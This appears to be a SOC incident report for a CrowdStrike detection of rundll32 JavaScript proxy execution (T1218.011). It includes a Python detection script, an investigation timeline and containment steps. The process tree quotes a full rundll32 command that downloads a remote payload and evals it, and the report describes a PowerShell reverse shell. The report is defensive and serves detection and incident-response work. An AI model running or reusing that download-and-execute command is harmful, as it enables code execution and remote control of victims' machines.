T1218.011 – Rundll32 Proxy Execution (CrowdStrike Detection)

CrowdStrike Alert Details
Alert ID: CS-RUNDLL32-PROXY-1218-7842
Alert Time: 2024-03-10 14:15:33 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: "Rundll32.exe Executing Remote JavaScript – Potential Squiblydoo"
MITRE ATT&CK: T1218.011 – System Binary Proxy Execution: Rundll32

Alert Details:

Detection: Rundll32.exe executing JavaScript from remote URL

Host: ENG-WS-045 (Engineering Workstation)
User: alexchen@company.com (Alex Chen, Engineer)
Time: 14:10 EST

Process Tree:

explorer.exe (PID: 2341)
  └─ cmd.exe (PID: 4789)
       └─ rundll32.exe (PID: 4792)
            Command: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://185.143.221[.]89/payload",false);h.Send();eval(h.responseText)

Detection Logic:

Rundll32.exe executing JavaScript (unusual)
JavaScript downloads and executes payload from remote URL
Parent process cmd.exe (unusual for rundll32)
Destination IP known malicious
Pattern matches rundll32 proxy execution
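The detection logic above, as an added example in Python that is not CrowdStrike's rule and not part of the original page: it scores constructed process-creation events against the same indicators (javascript: handler, mshtml RunHTMLApplication, embedded URL, download-and-eval pattern, unusual parent). The event field names and sample events are assumptions made for illustration.

```python
"""Score process-creation events for T1218.011 rundll32 JavaScript proxy execution.
Added example; the event layout and EVENTS below are constructed, not real telemetry."""
import re
from urllib.parse import unquote

# Constructed sample events: one matching the alert, one benign rundll32, one non-rundll32.
EVENTS = [
    {"pid": 4792, "parent": "cmd.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": 'rundll32.exe javascript:"..\\mshtml,RunHTMLApplication ";'
                'document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");'
                'h.Open("GET","http://185.143.221[.]89/payload",false);h.Send();eval(h.responseText)'},
    {"pid": 5100, "parent": "svchost.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"pid": 5222, "parent": "explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SCRIPT_PARENTS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe")

def analyze_event(event):
    """Return (score, reasons) for one event; score 0 means nothing matched."""
    if not event["image"].lower().endswith("rundll32.exe"):
        return 0, []
    # URL-decode (%20 etc.) and lowercase before matching so encoding tricks do not hide tokens.
    cmd = unquote(event["cmdline"]).lower()
    reasons = []
    if "javascript:" in cmd:
        reasons.append("rundll32 invoked with javascript: protocol handler")
    if "mshtml" in cmd and "runhtmlapplication" in cmd:
        reasons.append("mshtml RunHTMLApplication used as script host")
    if URL_RE.search(cmd):
        reasons.append("remote URL embedded in command line")
    if "winhttprequest" in cmd or "eval(" in cmd:
        reasons.append("download-and-eval pattern in script body")
    if event["parent"].lower() in SCRIPT_PARENTS:
        reasons.append(f"unusual parent process {event['parent']}")
    return len(reasons) * 20, reasons

def find_suspicious(events, threshold=40):
    """Return (pid, score, reasons) for every event at or above the alert threshold."""
    hits = []
    for ev in events:
        score, reasons = analyze_event(ev)
        if score >= threshold:
            hits.append((ev["pid"], score, reasons))
    return hits
```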
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed rundll32 JavaScript execution |
| 2. URL Analysis | Analyze payload URL | URLScan.io, VirusTotal | Payload contains PowerShell reverse shell |
| 3. Process Investigation | Identify source | CrowdStrike | User clicked link in email |
| 4. User Interview | Contact alexchen | Teams, Phone | User clicked "report" link; unaware |
| 5. Immediate Action | Terminate rundll32 process | CrowdStrike | Process killed |
| 6. Network Block | Block malicious URL | Palo Alto, Zscaler | URL and IP blocked |

Jira Incident Report
Ticket: SOC-2024-197
Summary: T1218.011 – Rundll32 JavaScript Proxy Execution
Status: RESOLVED
Resolution: MALICIOUS – Process Terminated
Priority: P2 – MEDIUM
Labels: T1218, rundll32, proxy-execution, crowdstrike, phishing
Components: Endpoint-Security, Web-Security

INCIDENT ANALYSIS REPORT

1. Initial Context:

Detection Source: CrowdStrike Falcon EDR.
Alert: “Rundll32.exe Executing Remote JavaScript – Potential Squiblydoo”.
Host: ENG-WS-045 (Engineering, user alexchen).
Process: rundll32.exe with JavaScript executing remote payload.
Time: 2024-03-10 14:15 EST.
Technique: MITRE ATT&CK T1218.011 – System Binary Proxy Execution: Rundll32.

2. Technical Analysis:

Attack Chain:

14:00 – User receives phishing email with link
14:02 – User clicks link
14:03 – Browser triggers cmd.exe
14:04 – cmd.exe launches rundll32 with JavaScript
14:05 – JavaScript downloads payload from 185.143.221[.]89
14:06 – Payload executes PowerShell reverse shell
14:10 – CrowdStrike detects

Rundll32 Technique:

Binary: C:\Windows\System32\rundll32.exe (trusted)
Method: Use JavaScript: protocol to run script via mshtml.dll
Effect: Can download and execute arbitrary code, bypassing whitelisting

Payload Analysis:

URL: http://185.143.221[.]89/payload
Content: PowerShell script (reverse shell)

Impact:

PowerShell reverse shell executed
C2 connection established (blocked)

3. Investigation Findings:

Timeline:

14:00 – Email received
14:02 – Link clicked
14:04-14:06 – Payload execution
14:10 – Alert
14:12 – SOC investigates
14:13 – Process terminated

Indicators of Compromise (IoCs):

Network:
– URL: http://185.143.221[.]89/payload
– IP: 185.143.221[.]89

Processes:
– rundll32.exe with JavaScript

4. Containment Actions:

Immediate Actions:

Terminated rundll32 process.
Blocked URL and IP.
Isolated host temporarily.
Reset user password.

Host Remediation:

Full scan (clean).
No reimage needed.

5. Root Cause Analysis:

Primary Cause: User clicked phishing link.
Contributing Factors:
No web filtering.

6. Business Impact:

Operational Impact: Engineering workstation offline for 1 hour.
Data Exposure: None.

7. Remediation & Prevention:

Completed Actions:

Process terminated.
User educated.

Technical Controls Enhanced:

Blocked rundll32 from executing JavaScript.
Enhanced URL filtering.

8. Conclusion:

An attacker used rundll32 to execute JavaScript and download a payload, bypassing application controls. CrowdStrike detected the anomalous process and terminated it.

Closure Rationale: Process terminated; URL blocked; user educated.

Analyst: [Your Name], SOC Analyst Date: 2024-03-10 15:30 EST
